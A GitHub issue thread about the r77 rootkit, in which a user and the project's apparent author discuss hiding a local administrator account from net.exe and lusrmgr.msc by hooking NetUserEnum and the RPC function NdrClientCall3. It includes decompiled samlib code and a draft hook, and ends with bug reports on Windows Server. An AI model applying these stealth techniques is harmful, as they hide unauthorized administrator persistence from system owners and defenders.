r77-rootkit
r77-rootkit copied to clipboard
bytecode77
Hiding users (net.exe and lusrmgr.msc)
would you add local user hidden from net.exe,net1.exe and lusrmgr.msc in the future?
A user has lots of traces all over the system, such as its files, an entire registry hive, etc. etc... What's your intention? Why do you consider net.exe to be enough to hide a user's activity? Maybe I can help you better when I understand your intensions a bit better.
windows has RDP service and control over RDP service required Admin User.the most obvious way to list all local users is net.exe,net1.exe and lusrmgr.msc. hooking NetUserEnum can hide users from "net.exe user" and "net1.exe user" command,but it can't hide users from "net.exe localgroup administrators" command hooking netapi32 api seems like no effect on lusrmgr.msc
Thanks for doing some research upfront. I've checked what this function is doing. It eventually calls NdrClientCall3, which is a RPC.
Call stack: netapi32.dll!NetUserEnum calls samcli.dll!NetUserEnum, which calls samlib.dll!SamEnumerateUsersInDomain
This is the call to NdrClientCall3.
if ( v15 )
{
if ( v15 != 1 )
return 3221225659i64;
LODWORD(v27) = v11;
LODWORD(v25) = v12;
LODWORD(v24) = v31;
v16.Pointer = NdrClientCall3(
(MIDL_STUBLESS_PROXY_INFO *)&pProxyInfo,
0x48u,
0i64,
v28.Simple,
a3,
v24,
v25,
&hMem,
v27,
v14).Pointer;
v17 = (unsigned int)v16.Pointer;
v28.Pointer = v16.Pointer;
}
else
{
LODWORD(v26) = v11;
LODWORD(v24) = v31;
v29.Pointer = NdrClientCall3(
(MIDL_STUBLESS_PROXY_INFO *)&pProxyInfo,
0xDu,
0i64,
v28.Simple,
a3,
v24,
&hMem,
v26,
v14).Pointer;
v17 = (unsigned int)v29.Pointer;
}
I've done only some quick research, but didn't check where this RPC is going. It would be best to hook the function at the remote endpoint (on the local computer of course). If this is not possible, hooking NdrClientCall3 may do it. I've googled and this function seems to be a popular target to hook.
I think this function is filling an array with the users. Would you like to hook it and inspect the output?
hooking NetUserEnum would do the trick about(net.exe user or net1.exe user),but not for "net.exe localgroup administrators" or "net1.exe localgroup administrators" command.trying NetGroupGetUsers,NetLocalGroupGetMembers and NetQueryDisplayInformation,but no luck.
Have you tried hooking NdrClientCall3? I didn't try, but I think it's always called, regardless of which app. You always want to hook the lowest level, not the higher level WinAPI functions.
there is an issue by hook NdrClientCall3
CLIENT_CALL_RETURN RPC_VAR_ENTRY NdrClientCall3(
MIDL_STUBLESS_PROXY_INFO *pProxyInfo,
unsigned long nProcNum,
void *pReturnValue,
...
);
static CLIENT_CALL_RETURN RPC_VAR_ENTRY HookedNdrClientCall3(MIDL_STUBLESS_PROXY_INFO* pProxyInfo, unsigned long nProcNum, void* pReturnValue, ...) { va_list args; va_start(args, pReturnValue); CLIENT_CALL_RETURN dwResult = OriginalNdrClientCall3(pProxyInfo, nProcNum, pReturnValue,args); va_end(args);
return dwResult;
}
try hooking like this,NdrClientCall3 get trigged but result in The binding handle is invalid when use net.exe user command.no sure how to call the original api based on that api defination.
I've disassembled rpcrt4.dll and found the function definition:
CLIENT_CALL_RETURN NdrClientCall3(MIDL_STUBLESS_PROXY_INFO *pProxyInfo, unsigned int nProcNum, void *pReturnValue, ...)
So first, nProcNumis an int, which is 4 bytes in a 32-bit process and 8 bytes in a 64-bit process. You have a long there, which is always 4 bytes. This might break the following parameters in x64.
I also wondered that such a low level function acutally uses argument lists, but it does. However, it calls NdrpClientCall3 after doing some parameter checking and converting the argument list to an array. It's worth hooking and looking at calls to this function, I guess.
Just to let you know, it's perfectly normal to spend weeks on figuring out one silly function. I've spent ages on figuring out the NT_NSI_PARAM struct. There is no documentation on that struct other than what I have figured out myself. That's why every single feature of a rootkit takes ages to implement, because 95% of the time I've spent in IDA.
the NdrClientCall3 definetion is from rpcndr.h NdrpClientCall3 is not exported in any dll. still lwarning how to use IDA .
IDA is a nice thing to learn, if you regularly work with hooks, exploits, etc...
You can hook a function that isn't exported, as long as you know the function pointer. You can get it using GetFunction, which I use to retrieve functions that are not exported, such as in R77_NtCreateThreadEx.
Dunno, if NdrpClientCall3 is the relevant function to hook, though.
found an issue today.After install the rootkit, "net.exe localgroup" will always return the error "System error 234 has occurred.More data is available." It occurs in all Windows Server,but Windows 10 works fine BTW,r77 probably not compatable with windows server 2008,once the rootkit installed,the system acting weird.